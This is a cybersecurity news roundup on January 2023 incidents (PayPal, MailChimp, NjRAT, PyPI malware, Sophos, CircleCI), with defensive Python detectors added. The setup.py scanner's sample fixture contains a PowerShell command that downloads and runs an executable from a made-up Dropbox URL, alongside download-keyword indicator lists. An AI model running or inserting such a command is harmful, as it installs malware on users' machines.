Thursday, January 19th, 2023
Cybersecurity Week in Review (20/1/23)
PayPal accounts breached in large-scale credential stuffing attack
PayPal is sending out data breach notifications to thousands of users who had their accounts accessed through credential stuffing attacks that exposed some personal data.
Credential stuffing is an attack in which hackers attempt to access accounts by trying username and password pairs sourced from data leaks on other websites. It relies on automation: bots run lists of leaked credentials against the login portals of many services, “stuffing” them in until one works. It succeeds against users who reuse the same password across multiple online accounts, a habit known as “password recycling.”
PayPal explains that the credential stuffing attack occurred between December 6 and December 8, 2022. The company detected and mitigated it at the time but also started an internal investigation to find out how the hackers obtained access to the accounts. By December 20, 2022, PayPal concluded its investigation, confirming that unauthorised third parties logged into the accounts with valid credentials. The electronic payments platform claims that this was not due to a breach on its systems and has no evidence that the user credentials were obtained directly from them.
According to the data breach reporting from PayPal, 34,942 of its users have been impacted by the incident. During the two days, hackers had access to account holders’ full names, dates of birth, postal addresses, social security numbers, and individual tax identification numbers. Transaction histories, connected credit or debit card details, and PayPal invoicing data are also accessible on PayPal accounts.
PayPal says it took timely action to limit the intruders’ access to the platform and reset the passwords of accounts confirmed to have been breached. The notification also states that the attackers did not attempt, or did not manage, to perform any transactions from the breached PayPal accounts.
Impacted users will receive a free-of-charge two-year identity monitoring service from Equifax. The company strongly recommends that recipients of the notices change the passwords for other online accounts, using a unique and long string for each. Typically, a good password is at least 12 characters long and includes alphanumeric characters and symbols. Enabling two-factor authentication wherever it is offered also blunts credential stuffing, since a reused password alone is then not enough to log in.
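The pattern described above (one source cycling through many different usernames with mostly failed logins) is what credential stuffing looks like in authentication logs. The following detector is an added example, not PayPal’s code or anything from the BleepingComputer article: it runs over a constructed sample log (the format, IP addresses and usernames are made up) and flags source IPs that try many distinct accounts in a short window with a low success ratio, then lists the accounts that did get a successful login from a flagged source, which is the set that needs a forced password reset.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of authentication events, one per line:
# <ISO-8601 timestamp> <source IP> <username> <FAIL|SUCCESS>
# The 203.0.113.7 lines model a stuffing bot working a leaked list;
# the 198.51.100.20 lines model a real user mistyping once and then logging in.
SAMPLE_LOG = """\
2022-12-06T10:00:00Z 203.0.113.7 u01@example.com FAIL
2022-12-06T10:00:01Z 203.0.113.7 u02@example.com FAIL
2022-12-06T10:00:02Z 203.0.113.7 u03@example.com SUCCESS
2022-12-06T10:00:03Z 203.0.113.7 u04@example.com FAIL
2022-12-06T10:00:04Z 203.0.113.7 u05@example.com FAIL
2022-12-06T10:00:05Z 203.0.113.7 u06@example.com FAIL
2022-12-06T10:00:06Z 203.0.113.7 u07@example.com FAIL
2022-12-06T10:00:07Z 203.0.113.7 u08@example.com FAIL
2022-12-06T10:00:08Z 203.0.113.7 u09@example.com SUCCESS
2022-12-06T10:00:09Z 203.0.113.7 u10@example.com FAIL
2022-12-06T10:00:10Z 203.0.113.7 u11@example.com FAIL
2022-12-06T10:00:11Z 203.0.113.7 u12@example.com FAIL
2022-12-06T10:03:00Z 198.51.100.20 u01@example.com FAIL
2022-12-06T10:03:05Z 198.51.100.20 u01@example.com SUCCESS
"""


def parse_log(text):
    """Parse the sample format into (timestamp, ip, user, outcome) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, outcome = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, outcome))
    return sorted(events)


def stuffing_sources(events, window=timedelta(minutes=5), min_users=10, max_success_ratio=0.2):
    """Flag source IPs that, within any `window`, try at least `min_users` distinct
    accounts with a success ratio at or below `max_success_ratio`.  A real user
    retrying their own password fails the distinct-account test; a bot working a
    leaked list fails the success-ratio test.  Thresholds are illustrative."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[1]].append(ev)
    flagged = {}
    for ip, evs in by_ip.items():
        for i in range(len(evs)):
            j = i
            while j < len(evs) and evs[j][0] - evs[i][0] <= window:
                j += 1
            span = evs[i:j]
            users = {e[2] for e in span}
            successes = sum(1 for e in span if e[3] == "SUCCESS")
            if len(users) >= min_users and successes / len(span) <= max_success_ratio:
                flagged[ip] = {"attempts": len(span), "distinct_users": len(users), "successes": successes}
                break
    return flagged


def compromised_accounts(events, flagged):
    """Accounts that logged in successfully from a flagged source: the set that
    needs a forced password reset and a breach notice."""
    return sorted({user for _, ip, user, outcome in events if ip in flagged and outcome == "SUCCESS"})


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    hits = stuffing_sources(evs)
    for ip, stats in hits.items():
        print(f"{ip}: {stats}")
    print("reset:", compromised_accounts(evs, hits))
```

Real bots spread attempts across many proxies, so in production the same logic is usually keyed on an ASN, a device fingerprint or simply on the global failure rate per minute rather than on a single IP; the distinct-accounts-per-source signal is still the cheapest first filter.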
Source – https://www.bleepingcomputer.com/news/security/paypal-accounts-breached-in-large-scale-credential-stuffing-attack/
MailChimp discloses new breach after employees got hacked
Email marketing firm MailChimp suffered another breach after hackers accessed an internal customer support and account administration tool, allowing the threat actors to access the data of 133 customers.
MailChimp says the attack was first detected on January 11th, and that it determined the attackers had gained access to employee credentials through a social engineering attack on Mailchimp employees and contractors. Affected accounts were temporarily suspended and primary contacts were notified.
MailChimp did not go into detail about the extent of the attack or what details were compromised but they did share that no credit card or password information was compromised as a result of the incident. One of the customers affected by this breach is the popular WooCommerce eCommerce plugin for WordPress. WooCommerce has emailed customers warning them that the MailChimp breach exposed their names, store URLs, addresses, and email addresses. While WooCommerce states that there is no indication that the stolen data has been misused, threat actors commonly use this type of data for targeted phishing attacks to steal credentials or install malware.
In April 2022, Trezor hardware wallet owners began receiving fake data breach notifications prompting customers to download a fake Trezor Suite software that would steal their recovery seeds. Trezor said on Twitter that the mailing list used in this phishing campaign was a Trezor mailing list stolen in a breach on MailChimp.
MailChimp later confirmed that the April 2022 breach was more extensive than first reported, with employees falling for a social engineering attack that allowed threat actors to access 319 MailChimp accounts and export the data of 102 customers. The marketing company confirmed that this data was being used in phishing emails but declined to share more information about the attacks.
Source – https://www.bleepingcomputer.com/news/security/mailchimp-discloses-new-breach-after-employees-got-hacked/
Earth Bogle Campaign Unleashes NjRAT Trojan on Middle East and North Africa
An ongoing campaign dubbed Earth Bogle is leveraging geopolitical-themed lures to deliver the NjRAT remote access trojan to victims across the Middle East and North Africa.
The threat actor uses public cloud storage services such as files[.]fm and failiem[.]lv to host malware, while compromised web servers distribute NjRAT. Phishing emails, typically tailored to the victim’s interests, are loaded with malicious attachments to activate the infection routine. This takes the form of a Microsoft Cabinet (CAB) archive file containing a Visual Basic Script dropper to deploy the next-stage payload.
Alternatively, it’s suspected that the files are distributed via social media platforms such as Facebook and Discord, in some cases even creating bogus accounts to serve ads on pages impersonating legitimate news outlets. The CAB files, hosted on cloud storage services, also masquerade as sensitive voice recordings to entice the victim into opening the archives, only for the VBScript to be executed, leading to the retrieval of another VBScript file that masks itself as an image file. The second-stage VBScript, for its part, fetches from an already breached domain a PowerShell script that’s responsible for loading the RAT payload into memory and executing it.
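The first stage of the chain above is a CAB archive carrying a VBScript dropper disguised as a voice recording, so a mail gateway or triage script needs to look at what is inside the cabinet before anyone opens it. The following is an added example, not code from Trend Micro’s report or from the Earth Bogle samples: it parses only the CAB header and CFFILE directory (the `MSCF` structure layout is Microsoft’s documented format; no decompression is performed, so it is safe on untrusted input), and flags members whose real extension is a script or executable, noting double-extension names such as `recording.mp3.vbs`. The sample cabinet is constructed in the block; it is a header-only CAB that lists correctly but cannot be extracted.

```python
import struct

CFHEADER = "<4sIIIIIBBHHHHH"  # signature, reserved1, cbCabinet, reserved2, coffFiles, reserved3,
                              # versionMinor, versionMajor, cFolders, cFiles, flags, setID, iCabinet
CFFILE = "<IIHHHH"            # cbFile, uoffFolderStart, iFolder, date, time, attribs; then NUL-terminated name
NAME_IS_UTF = 0x80            # attribs bit: file name is UTF-8 rather than the OEM code page
# Extensions that mean "this runs", whatever the name in front of them claims to be.
ACTIVE_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1",
               ".bat", ".cmd", ".exe", ".scr", ".dll", ".lnk")


def cab_members(data):
    """List (name, size) for every CFFILE entry, reading only the CAB headers."""
    if len(data) < struct.calcsize(CFHEADER) or data[:4] != b"MSCF":
        raise ValueError("not a Microsoft Cabinet file")
    (_sig, _r1, _cb_cabinet, _r2, coff_files, _r3, _vmin, _vmaj,
     _c_folders, c_files, _flags, _set_id, _i_cab) = struct.unpack_from(CFHEADER, data, 0)
    members, off = [], coff_files
    for _ in range(c_files):
        cb_file, _uoff, _ifolder, _date, _time, attribs = struct.unpack_from(CFFILE, data, off)
        off += struct.calcsize(CFFILE)
        end = data.index(b"\x00", off)
        encoding = "utf-8" if attribs & NAME_IS_UTF else "cp437"
        members.append((data[off:end].decode(encoding, errors="replace"), cb_file))
        off = end + 1
    return members


def suspicious_members(data):
    """Members with an executable/script extension, plus whether the name uses a
    double extension (e.g. 'recording.mp3.vbs') to pose as media or a document."""
    hits = []
    for name, size in cab_members(data):
        base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
        if base.endswith(ACTIVE_EXTS):
            hits.append((name, size, base.count(".") > 1))
    return hits


def build_sample_cab(entries):
    """Construct a header-only CAB (one folder, no CFDATA blocks) for exercising the
    listing code.  Structurally valid for listing, not extractable."""
    folder = struct.pack("<IHH", 0, 0, 0)  # coffCabStart, cCFData, typeCompress = none
    files = b"".join(
        struct.pack(CFFILE, size, 0, 0, 0x5626, 0x5000, 0x20) + name.encode("cp437") + b"\x00"
        for name, size in entries
    )
    coff_files = struct.calcsize(CFHEADER) + len(folder)
    header = struct.pack(CFHEADER, b"MSCF", 0, coff_files + len(files), 0, coff_files, 0,
                         3, 1, 1, len(entries), 0, 0, 0)
    return header + folder + files


# Constructed lure: a "voice recording" whose real extension is .vbs, beside a harmless text file.
SAMPLE_CAB = build_sample_cab([("voice_message_2023.mp3.vbs", 4096), ("readme.txt", 120)])

if __name__ == "__main__":
    for name, size, double_ext in suspicious_members(SAMPLE_CAB):
        print(f"{name} ({size} bytes){'  <- double extension' if double_ext else ''}")
```

Blocking on the member list alone does not catch a CAB that contains only a benign-looking document and fetches the script later, which is why the later stages in this chain (the image-named VBScript and the PowerShell loader pulled from a compromised domain) need their own egress and script-host controls.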
NjRAT (aka Bladabindi), first discovered in 2013, has myriad capabilities that allow the threat actor to harvest sensitive information and gain control over compromised computers. This case demonstrates that threat actors will leverage public cloud storage as malware file servers, combined with social engineering techniques appealing to people’s sentiments such as regional geopolitical themes as lures, to infect targeted populations.
Source – https://thehackernews.com/2023/01/earth-bogle-campaign-unleashes-njrat.html
1000 Shipping Vessels Impacted by Ransomware Attack
DNV, a Norwegian software supplier that provides services for 12,000 ships and mobile offshore units across the globe, said its ShipManager software had been hit by a cyber-attack on January 7, 2023.
Around 70 customers operating roughly 1,000 vessels have been impacted. These customers have been advised to consider relevant mitigating measures depending on the types of data they have uploaded to the system. DNV added that it had informed the impacted parties of their responsibility to notify the relevant data protection authorities in their countries. However, the firm said there are no indications that any other data or servers at DNV are affected, and the server outage has not impacted any of its other services.
Additionally, the incident has not affected the vessels’ ability to operate. This is because they can still use the onboard, offline functionalities of the ShipManager software. Also, other systems on the impacted ships remain unaffected.
DNV has reported the attack to the Norwegian Police, which is liaising with other relevant government agencies, including the Norwegian Data Protection Authority (Datatilsynet) and the German Federal Office for Information Security (BSI).
The maritime industry has been hit by a number of high-profile cyber incidents in recent years, with the potential to cause substantial economic disruption making it a tempting target for extortion campaigns. Many ships also contain aging technological infrastructure, making them particularly vulnerable to vectors like ransomware.
The increasing interconnectedness of physical and digital systems in sectors like shipping is making incidents of this nature harder to mitigate. Unfortunately, attacks on critical infrastructure are increasing as operators add connected cyber-physical systems to their networks without matching protection.
Source – https://www.infosecurity-magazine.com/news/shipping-vessels-ransomware-attack/
Researchers Uncover 3 PyPI Packages Spreading Malware to Developer Systems
A threat actor by the name Lolip0p has uploaded three rogue packages to the Python Package Index (PyPI) repository that are designed to drop malware on compromised developer systems.
The packages – named colorslib (versions 4.6.11 and 4.6.12), httpslib (versions 4.6.9 and 4.6.11), and libhttps (version 4.6.12) – were uploaded by the author between January 7, 2023, and January 12, 2023. They have since been yanked from PyPI but not before they were cumulatively downloaded over 550 times. The modules come with identical setup scripts that are designed to invoke PowerShell and run a malicious binary (“Oxzy.exe”) hosted on Dropbox.
The executable, once launched, triggers the retrieval of a next-stage binary named update.exe that runs from the user’s temporary folder (“%USERPROFILE%\AppData\Local\Temp\”). update.exe is flagged by antivirus vendors on VirusTotal as an information stealer that’s also capable of dropping additional binaries, one of which is detected by Microsoft as Wacatac. The Windows maker describes the trojan as a threat that can perform a number of actions of a malicious hacker’s choice on your PC, including delivering ransomware and other payloads.
The disclosure arrives weeks after two other rogue packages by the names of Shaderz and aioconsol that harbor similar capabilities to gather and exfiltrate sensitive personal information were detected. The findings once again demonstrate the steady stream of malicious activity recorded in popular open-source package repositories, wherein threat actors are taking advantage of the trust relationships to plant tainted code in order to amplify and extend the reach of the infections.
Users are advised to exercise caution when it comes to downloading and running packages from untrusted authors to avoid falling prey to supply chain attacks.
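The useful check here is to read a package’s setup.py before it is allowed to run, because in this campaign the install script itself is the dropper. The scanner below is an added example (not the researchers’ tooling and not the Lolip0p packages’ code): it parses setup.py with Python’s `ast` module without executing it and reports install-time process execution, PowerShell and download keywords, and URLs to file-sharing hosts or to executable payloads, while ignoring the ordinary `url=` metadata field. The indicator lists are illustrative assumptions, and the sample setup.py is constructed to match the behaviour described above (the Dropbox path in it is made up).

```python
import ast
import re
from urllib.parse import urlparse

# Illustrative indicator lists, not a complete rule set.
SUSPICIOUS_IMPORTS = {"subprocess", "urllib", "requests", "base64", "ctypes", "socket"}
SHELL_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call", "subprocess.check_output",
               "os.system", "os.popen", "os.startfile", "exec", "eval"}
KEYWORDS = ("powershell", "invoke-webrequest", "downloadstring", "frombase64string", "cmd.exe")
FILE_HOSTS = {"dropbox.com", "www.dropbox.com", "dl.dropboxusercontent.com", "transfer.sh", "pastebin.com"}
PAYLOAD_EXTS = (".exe", ".dll", ".ps1", ".bat", ".scr")
URL_RE = re.compile(r"https?://\S+")


def dotted(node):
    """Render a call target as a dotted name ('subprocess.Popen'), or None if it is not a plain name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup(source):
    """Return sorted (line, kind, detail) findings for a setup.py without executing it."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            names = []
        for name in names:
            if name.split(".")[0] in SUSPICIOUS_IMPORTS:
                findings.append((node.lineno, "import", name))
        if isinstance(node, ast.Call) and dotted(node.func) in SHELL_CALLS:
            findings.append((node.lineno, "call", dotted(node.func)))
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            text = node.value.lower()
            keyword = next((k for k in KEYWORDS if k in text), None)
            if keyword:
                findings.append((node.lineno, "string", keyword))
            for url in URL_RE.findall(text):
                parsed = urlparse(url)
                if (parsed.hostname or "") in FILE_HOSTS or parsed.path.endswith(PAYLOAD_EXTS):
                    findings.append((node.lineno, "url", parsed.hostname or ""))
    return sorted(findings)


def verdict(findings):
    """'block' when install-time code execution meets a payload indicator, 'review' for
    any other finding, 'ok' for a setup.py that only declares metadata."""
    kinds = {kind for _, kind, _ in findings}
    if "call" in kinds and kinds & {"string", "url"}:
        return "block"
    return "review" if findings else "ok"


# Constructed setup.py in the shape the article describes; the Dropbox path is made up.
SAMPLE_SETUP = '''
from setuptools import setup
import subprocess, os

subprocess.Popen(
    ["powershell", "-WindowStyle", "Hidden", "-Command",
     "Invoke-WebRequest https://www.dropbox.com/s/example/Oxzy.exe -OutFile $env:TEMP/Oxzy.exe; "
     "Start-Process $env:TEMP/Oxzy.exe"]
)

setup(name="colorslib", version="4.6.12", url="https://example.com/colorslib", packages=[])
'''

if __name__ == "__main__":
    found = scan_setup(SAMPLE_SETUP)
    for line, kind, detail in found:
        print(f"line {line}: {kind} {detail}")
    print("verdict:", verdict(found))
```

Fetch the sdist archive itself rather than letting pip prepare it: pip can run setup.py to compute an sdist’s metadata, so download the .tar.gz from the package’s file listing, unpack it and run `scan_setup` over its setup.py before anything installs. A static scan is easy to evade with obfuscation, so treat it as a gate that forces a human look, not as proof of safety.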
Source – https://thehackernews.com/2023/01/researchers-uncover-3-pypi-packages.html
Ireland tops EU league table for data fines
Ireland has topped a league table of EU countries with aggregate data breach fines imposed to date totalling more than €1 billion.
According to the latest GDPR and Data Breach Survey from law firm DLA Piper, Luxembourg is in second position, with the highest individual fine of €746 million which was issued in 2021. The report finds that 2022 was another record year with European data regulators issuing €2.9 billion in GDPR fines last year. This was more than double the value of fines issued in 2021.
The year’s highest fine of €405 million was imposed by the Irish Data Protection Commission (DPC) against Meta for breaches by Instagram relating to children’s personal data. Meta is currently appealing the decision in the High Court.
The survey looks at data fines issued since 28 January 2022 and covers all 27 EU member states as well as the UK, Norway, Iceland, and Liechtenstein. It found that the average number of notified data breaches per day fell slightly from 328 to 300.
“With data protection enforcement on the rise, it is probably no coincidence that organisations are increasingly cautious around when and how they report data breaches to regulators,” said John Magee, Partner and Head of Data Protection, Privacy & Information Security at DLA Piper Ireland. “The fear of investigations, fines, and compensation claims is likely driving what is a small but significant reduction in breach reporting numbers,” he added.
Source – https://www.rte.ie/news/business/2023/0117/1349063-data-breach-fines/
Over 4,000 Sophos Firewall devices vulnerable to RCE attacks
Over 4,000 Sophos Firewall appliances exposed to Internet access are vulnerable to attacks targeting a critical remote code execution (RCE) vulnerability.
Sophos disclosed this code injection flaw (CVE-2022-3236) found in the User Portal and Webadmin of Sophos Firewall in September and also released hotfixes for multiple Sophos Firewall versions (official fixes were issued three months later, in December 2022). The company warned at the time that the RCE bug was being exploited in the wild in attacks against organisations from South Asia.
The September hotfixes rolled out to all affected instances (v19.0 MR1/19.0.1 and older) since automatic updates are enabled by default — unless an administrator disabled the option. Sophos Firewall instances running older product versions had to be upgraded manually to a supported version to receive the CVE-2022-3236 hotfix automatically. Admins who cannot patch the vulnerable software can also remove the attack surface by disabling WAN access to the User Portal and Webadmin.
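The two facts that matter for each appliance are whether it sits in the affected range (v19.0 MR1/19.0.1 and older without the hotfix) and whether its User Portal or Webadmin is reachable from the WAN. The triage pass below is an added example, not a Sophos tool: it normalises the version strings Sophos uses (“19.0 MR1”, “19.0.1 MR-1”, “18.5 MR4”, “19.5 GA”) into comparable tuples and applies those two checks to an inventory. The inventory rows and their field names are assumptions standing in for an export from whatever manages your firewalls.

```python
import re

# Version strings as Sophos writes them: "19.0 MR1", "v19.0.1", "19.0.1 MR-1", "18.5 MR4", "19.5 GA".
VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)(?:\.(\d+))?(?:\s*(?:MR[- ]?(\d+)|GA))?$", re.IGNORECASE)
LAST_AFFECTED = (19, 0, 1)  # v19.0 MR1 / 19.0.1 and older, per the advisory summarised above


def parse_sfos_version(text):
    """Normalise a Sophos Firewall version to (major, minor, maintenance release)."""
    match = VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised Sophos Firewall version: {text!r}")
    major, minor, patch, mr = match.groups()
    return (int(major), int(minor), int(mr if mr is not None else (patch or 0)))


def triage(inventory):
    """inventory rows: {"host", "version", "hotfix_applied", "wan_portal_exposed"} (assumed fields).
    Returns (host, version_tuple, vulnerable, action) per row."""
    results = []
    for row in inventory:
        version = parse_sfos_version(row["version"])
        vulnerable = version <= LAST_AFFECTED and not row["hotfix_applied"]
        if not vulnerable:
            action = "ok"
        elif row["wan_portal_exposed"]:
            action = "urgent: disable WAN access to User Portal/Webadmin, then upgrade to a release that receives the hotfix"
        else:
            action = "upgrade to a release that receives the hotfix"
        results.append((row["host"], version, vulnerable, action))
    return results


# Constructed inventory; hosts and their states are made up for the example.
SAMPLE_INVENTORY = [
    {"host": "fw-hq",      "version": "19.5 GA",   "hotfix_applied": False, "wan_portal_exposed": True},
    {"host": "fw-branch1", "version": "19.0 MR1",  "hotfix_applied": True,  "wan_portal_exposed": True},
    {"host": "fw-branch2", "version": "v18.5 MR4", "hotfix_applied": False, "wan_portal_exposed": True},
    {"host": "fw-lab",     "version": "19.0.1",    "hotfix_applied": False, "wan_portal_exposed": False},
]

if __name__ == "__main__":
    for host, version, vulnerable, action in triage(SAMPLE_INVENTORY):
        print(f"{host:12} {'.'.join(map(str, version)):8} vulnerable={vulnerable!s:5} {action}")
```

The `hotfix_applied` flag has to come from the device itself (the hotfix does not change the displayed version), and an appliance on a release too old to receive hotfixes stays vulnerable until it is upgraded, which is why the action for those is an upgrade rather than waiting for automatic updates.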
However, a recent scan discovered that out of more than 88,000 instances, around 6% or more than 4,000 are running versions that haven’t received a hotfix and are vulnerable to CVE-2022-3236 attacks. Luckily, despite already being exploited as a zero-day, a CVE-2022-3236 proof-of-concept exploit is yet to be published online. However, it was possible to reproduce the exploit from technical information shared by Trend Micro’s Zero Day Initiative (ZDI), so it is likely that threat actors will soon be able to as well.
When and if this happens, it will most likely lead to a new wave of attacks as soon as threat actors create a fully working version of the exploit and add it to their tool set. Mass exploitation would likely be hindered by Sophos Firewall requiring web clients by default to solve a CAPTCHA during authentication; to work around this limitation and reach the vulnerable code, attackers would have to include an automated CAPTCHA solver.
Patching Sophos Firewall bugs is critically important, given that this wouldn’t be the first time such a vulnerability is exploited in the wild. In March 2022, Sophos patched a similar critical Sophos Firewall bug (CVE-2022-1040) in the User Portal and Webadmin modules that enabled authentication bypass and arbitrary code execution attacks. It was also exploited in attacks as a zero-day since early March (roughly three weeks before Sophos released patches) against South Asian organisations by a Chinese threat group tracked as DriftingCloud.
Source – https://www.bleepingcomputer.com/news/security/over-4-000-sophos-firewall-devices-vulnerable-to-rce-attacks/
New Backdoor Created Using Leaked CIA’s Hive Malware Discovered in the Wild
Unidentified threat actors have deployed a new backdoor that borrows its features from the U.S. Central Intelligence Agency (CIA)’s Hive multi-platform malware suite, the source code of which was released by WikiLeaks in November 2017.
This is the first time a variant of the CIA Hive attack kit has been caught in the wild, and it was named xdr33 based on its embedded Bot-side certificate CN=xdr33. xdr33 is said to be propagated by exploiting an unspecified N-day security vulnerability in F5 appliances. It communicates with a command-and-control (C2) server using SSL with forged Kaspersky certificates.
The intent of the backdoor is to harvest sensitive information and act as a launchpad for subsequent intrusions. It improves upon Hive by adding new C2 instructions and functionalities, among other implementation changes. The ELF sample further operates as a Beacon by periodically exfiltrating system metadata to the remote server and executing commands issued by the C2. This includes the ability to download and upload arbitrary files, run commands via cmd, and launch a shell, in addition to updating and erasing traces of itself from the compromised host.
The malware also incorporates a Trigger module that’s designed to eavesdrop on network traffic for a specific trigger packet in order to extract the C2 server mentioned in the IP packet’s payload, establish connection, and wait for the execution of commands sent by the C2.
It is worth noting that Trigger C2 differs from Beacon C2 in the details of communication: after establishing an SSL tunnel, [the] bot and Trigger C2 use a Diffie-Hellman key exchange to establish a shared key, which is used with the AES algorithm to create a second layer of encryption.
Source – https://thehackernews.com/2023/01/new-backdoor-created-using-leaked-cias.html
Nissan data breach exposed clients’ full names and dates of birth
Nissan North America started informing customers of a data breach at a third-party service provider that leaked customer information.
Nissan disclosed a data breach that affected close to 18,000 of the company’s clients. According to the notice of data breach Nissan sent to affected customers, user data leaked via a third-party vendor that provided software development services to the automaker. According to the company, the leaked data included users’ names, dates of birth, and Nissan Motor Acceptance Company (NMAC) account numbers.
Nissan first learned that specific data it gave to the vendor was inadvertently exposed on June 21, 2022. Three months later, on September 26, 2022, the company’s investigation led the firm to believe that the incident resulted in unauthorised access to user data. Specifically, the data embedded within the code during software testing was unintentionally and temporarily stored in a cloud-based public repository. This information did not include Social Security numbers or credit card information.
Even though Nissan first learned of the exposure in late June, the company only disclosed the breach on January 16, 2023, nearly seven months later. Nissan’s slow disclosure mirrors other companies that have lagged in telling people their data was taken. For example, it took Five Guys, a popular American fast-food chain, close to three months to inform its employees that threat actors might have accessed their sensitive data, such as Social Security numbers (SSNs).
Source – https://cybernews.com/news/nissan-data-breach-exposed-full-names/?
Raccoon and Vidar Stealers Spreading via Massive Network of Fake Cracked Software
A large infrastructure comprising over 250 domains is being used to distribute information-stealing malware such as Raccoon and Vidar since early 2020.
The infection chain has been identified using about a hundred fake cracked software catalogue websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub. The domains are thought to be operated by a threat actor running a traffic direction system (TDS), which allows other cybercriminals to rent the service to distribute their malware.
The attacks target users searching for cracked versions of software and games on search engines like Google, surfacing fraudulent websites on top by leveraging a technique called search engine optimisation (SEO) poisoning to lure victims into downloading and executing the malicious payloads. The poisoned result comes with a download link to the promised software that, upon clicking, triggers a five-stage URL redirection sequence to take the user to a web page displaying a shortened link, which points to a password-protected RAR archive file hosted on GitHub, along with its password.
Using several redirections complicates automated analysis by security solutions. Splitting the infrastructure into stages like this is also designed for resilience, making it easier and quicker to update or replace any single step.
Should the victim uncompress the RAR archive and run the purported setup executable contained within it, one of the two malware families, Raccoon or Vidar, is installed on the system. Both pieces of malware are equipped to siphon a wide range of personal information from compromised machines, harvest credentials from web browsers, and steal data from various cryptocurrency wallets.
Users are advised to refrain from downloading pirated software and enforce multi-factor authentication wherever possible to harden accounts.
Source – https://thehackernews.com/2023/01/raccoon-and-vidar-stealers-spreading.html
CircleCI’s hack caused by malware stealing engineer’s 2FA-backed session
Hackers breached CircleCi in December after an engineer’s machine was infected with information-stealing malware that stole their 2FA-backed SSO session cookie, which allowed access to the company’s internal systems.
Earlier this month, CircleCi disclosed that they suffered a security incident and warned customers to rotate their tokens and secrets. In a new security incident report on the attack, CircleCi concluded that an engineer had become infected on December 16th with information-stealing malware that the company’s antivirus software did not detect.
This malware was able to steal a corporate session cookie that had already been authenticated via 2FA, allowing the threat actor to log in as the user without having to complete 2FA again. With the stolen cookie, the attacker could impersonate the targeted employee from a remote location and then escalate access to a subset of CircleCi’s production systems.
Using the engineer’s privileges, CircleCi says the hacker began stealing data on December 22nd from some of the company’s databases and stores, including customer’s environment variables, tokens, and keys. While CircleCi encrypted the data at rest, the hacker also stole encryption keys by dumping them from running processes, potentially allowing the threat actor to decrypt the encrypted, stolen data.
After learning of the data theft, the company began alerting customers via email about the incident, warning them to rotate all tokens and secrets if they had logged in between December 21st, 2022, and January 4th, 2023.
In response to the attack, CircleCi says they rotated all tokens associated with their customers, including Project API Tokens, Personal API Tokens, and GitHub OAuth tokens. The company also worked with Atlassian and AWS to notify customers of possibly compromised Bitbucket tokens and AWS tokens. To further strengthen their infrastructure, CircleCi says they added further detections for the behavior exhibited by the information-stealing malware to their antivirus and mobile device management (MDM) systems.
The company also further restricted access to its production environments to a smaller subset of people and increased the security of its 2FA implementation.
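The root of this incident is that a session cookie was treated as a complete proof of identity: once stolen, it worked from anywhere until it expired. The session store below is an added example, not CircleCI’s implementation and not a description of how they hardened their 2FA: it binds each session to a keyed hash of the client attributes seen at login, answers “step up” (demand a fresh 2FA challenge) rather than “allow” when the same cookie arrives from a different client or when a sensitive action is attempted on stale 2FA, enforces idle and absolute lifetimes, and can revoke every session of a user once a theft is known. Timestamps are passed in explicitly so the scenario can be replayed; the IPs, user agents and server key are constructed.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass


@dataclass
class Session:
    user: str
    created: float
    last_seen: float
    mfa_at: float          # when the user last completed 2FA
    fingerprint: str       # keyed hash of client attributes seen when the session was minted


class SessionStore:
    """In-memory store that refuses to treat a bearer cookie as proof of identity on its own."""
    ABSOLUTE_TTL = 8 * 3600      # re-authenticate at least once a working day
    IDLE_TTL = 30 * 60
    MFA_STEP_UP_AFTER = 15 * 60  # sensitive actions need 2FA completed within the last 15 minutes

    def __init__(self, server_key):
        self._key = server_key
        self._sessions = {}

    def fingerprint(self, ip, user_agent):
        # Keyed so the stored value cannot be reversed or precomputed from leaked client data.
        return hmac.new(self._key, f"{ip}|{user_agent}".encode(), hashlib.sha256).hexdigest()

    def create(self, user, ip, user_agent, now):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = Session(user, now, now, now, self.fingerprint(ip, user_agent))
        return sid

    def validate(self, sid, ip, user_agent, now, sensitive=False):
        """Return (decision, reason); decision is 'allow', 'step_up' or 'deny'."""
        session = self._sessions.get(sid)
        if session is None:
            return ("deny", "unknown session")
        if now - session.created > self.ABSOLUTE_TTL or now - session.last_seen > self.IDLE_TTL:
            del self._sessions[sid]
            return ("deny", "expired")
        if not hmac.compare_digest(session.fingerprint, self.fingerprint(ip, user_agent)):
            # A stolen cookie replayed from another host lands here: the cookie alone is not enough.
            return ("step_up", "session presented from a different client")
        if sensitive and now - session.mfa_at > self.MFA_STEP_UP_AFTER:
            return ("step_up", "fresh 2FA required for a sensitive action")
        session.last_seen = now
        return ("allow", "")

    def mfa_completed(self, sid, ip, user_agent, now):
        """After a successful 2FA challenge, rebind the session to the client that passed it."""
        session = self._sessions[sid]
        session.mfa_at = session.last_seen = now
        session.fingerprint = self.fingerprint(ip, user_agent)

    def revoke_user(self, user):
        """Kill every session for a user (what you do once a theft is known). Returns the count."""
        doomed = [sid for sid, s in self._sessions.items() if s.user == user]
        for sid in doomed:
            del self._sessions[sid]
        return len(doomed)
```

The binding raises the attacker’s cost but is not a complete fix: an info-stealer can copy the user agent along with the cookie, and malware that tunnels through the victim’s machine presents the victim’s own IP, so the step-up and short lifetimes matter more than the exact fingerprint. Bind on coarse attributes (network, device certificate or a managed-device signal) so that ordinary roaming does not lock users out, and prefer device-bound credentials where the platform offers them.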
